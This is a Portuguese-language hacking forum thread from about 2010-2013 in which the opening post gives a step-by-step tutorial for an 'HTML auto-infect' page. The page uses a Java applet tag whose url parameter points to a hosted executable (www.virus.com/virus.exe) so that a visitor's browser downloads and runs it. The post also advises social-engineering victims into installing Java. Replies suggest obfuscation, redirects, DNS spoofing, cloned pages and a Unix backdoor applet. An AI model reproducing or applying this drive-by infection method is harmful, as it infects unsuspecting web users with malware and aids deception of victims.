Auto infect por URL (HTML Auto Infect)

Iniciado por DarkGenesis, 15 de Novembro , 2010, 08:35:35 AM

tópico anterior - próximo tópico

0 Membros e 1 Visitante estão vendo este tópico.

DarkGenesis

Um HTML auto-infect é uma página da web que executa códigos ou softwares maliciosos sem o conhecimento da vitima.

Segue abaixo em anexo os arquivos necessários e o tutorial para configuração:

  • 1- Faça upload do .exe desejado em um host e pegue o link. Ex: www.virus.com/virus.exe
  • 2 – Agora, edite o HTML de auto-infect:
    Citar<applet name="link" code="Inicio.class" archive="link.jar" height="10" width="1">
    <param name="url" value="virus.exe">

    Troque isso para:
    <
    Citarapplet name="link" code="Inicio.class" archive="link.jar" height="10" width="1">
    <param name="url" value="www.virus.com/virus.exe">

    PS: www.virus.com/virus.exe é apenas um exemplo! Nesse passo, você deve substituir pelo link obtido ao fazer o upload do .exe no seu host!

  • 3- Hospede também, no mesmo host, o arquivo .html, o arquivo LOGGER e o arquivo .jar (ambos no mesmo diretório).

  • 4- Pronto! Ao acessar o .html, ele vai rodar o virus.exe!

    PS: Se a vítima não tiver o Java Runtimes instalado no computador, o navegador irá mostrar a opção para instalar. Se isso acontecer, é so você enrolar a vítima com uma engenharia social (falando que é um jogo em java e precisa de complemento, por exemplo).

  • Pagina do auto infect em anexo:
    Password: www.darkers.com.br

ÐλяkFeλя


Mateus

que falha é essa? de quando é? já tem patch?  8)

Peace!
H4X with axes 8)

GeeK RooT

'
#3
'

n0mor3

dahora, mano

acho que essa falha não é nova, porem nao tem patch ou algum tipo de proteção ?
acho que só os AV's pegam na hora, mas aí seria só melhora-lo :)
HTML é perigoso, rs..

fuckoff

Esse parâmetro se aproveita de alguma falha relacionada ao Browser, ou vem do sistema mesmo?
Se sim à primeira hipótese, quais os browsers vulneráveis?

Abraços,
StanleySathler.

हमलावर

so falta... um script Redirecionamento url e encriptação codigo html.

andrezc

Legal.  Não testei, mas vou testar.  Acabei ficando curioso.  Eu estou pensando em criar um java applet que cria um shell script em /tmp e se auto-executa, esse shell script deve abrir um backdoor em sistemas UNIX e UNIX-like (Linux,  *BSD e etc.) .  É um pouco improvável essa parte de se auto-executar, já que os arquivos no Linux não são auto-executáveis como no Windows, mas estou pesquisando bastante a respeito.


DarkGenesis


Sheriff

Citação de: n0mor3 online 15 de Novembro , 2010, 06:30:15 PM
dahora, mano

acho que essa falha não é nova, porem nao tem patch ou algum tipo de proteção ?
acho que só os AV's pegam na hora, mas aí seria só melhora-lo :)
HTML é perigoso, rs..

Nao acredito que seja uma falha, eh coisa da programação mesmo. Acho que isso nao eh coisa de html, mas de java. E os AVs nao podem fazer nada "quanto a isso". Acontece a mesma coisa quando voce quer baixar videos do youtube no keepvid.com e outros sites do tipo; voce instala o java e depois autoriza o mesmo rodar scripts no servidor pra pegar os videos mesmo sabendo os riscos da execucao do tal. Li a mensagem e percebi que o acesso do script eh irrestrito, provavelmente de administrador. Acho que da pra checar as configurações no registro a procura de informações pra deixar sempre ativada a opcao de permissao, quero dizer, verificar o que acontece no registro depois que alguem deixa marcada a opcao "sempre confiar no editor'. Acho que eu consigo encontrar e fazer um .reg pra ativar. Reparem na mensagem de advertencia de segurança quando queremos baixar o video, notem que antes da mensagem aparecer ele carrega o applet (Loading java applet...), depois aparece outra mensagem dizendo "Deseja executar essa aplicação?", e logo em seguida uma mensagem dizendo o nome da aplicacao, editor, e o local que ela estah no servidor (keepvid.com/kv.60.jar), nao deixem de notar tambem a mensagem descrendo o risco para segurança. Tenho um amigo que eh o Deus do java, ele disse pra mim a muito tempo atras que ganhava muito dinheiro com fishing usando java.

http://www.phrack.org/issues.html?issue=65&id=5#article

Com applets podemos fazer muitas coisas como pegar o ip por exemplo. Java eh usada em muitas outras tecnicas como voce pode ver acima. UPnP tuneling eh uma tecnica muito perigosa que da acesso ao atacante a maquina filtradas por NAT, ou seja, com o enderecos de rede interna, como 192.168 etc. Li um tempinho atras esse artigo e entendi o mesmo. Entendi como o applet funcionava e tudo mais, mas nao procurei fazer melhorias nem nada, simplesmente foi fugindo da minha mente.
 
Citação de: DarkGenesis online 15 de Agosto , 2013, 02:32:13 AM
Download Corrigido ✔

404 - Anexo não encontrado

Pode hospedar pra mim novamente?

eb0x

 ;D Essa falha junto com um DNS Spoofing fica bem mais rica.
Com a clonagem de uma pagina e sua criatividade podera ter grandes resultados.

Sheriff

Citação de: eb0x online 07 de Outubro , 2013, 10:19:33 AM
;D Essa falha junto com um DNS Spoofing fica bem mais rica.
Com a clonagem de uma pagina e sua criatividade podera ter grandes resultados.

DNS Spoofing eh muito rulez mesmo, usei uma vez em 2007 e foi cool, mas no que voce se baseia pra dizer que <applet name=""... eh uma falha?


luisaugustok9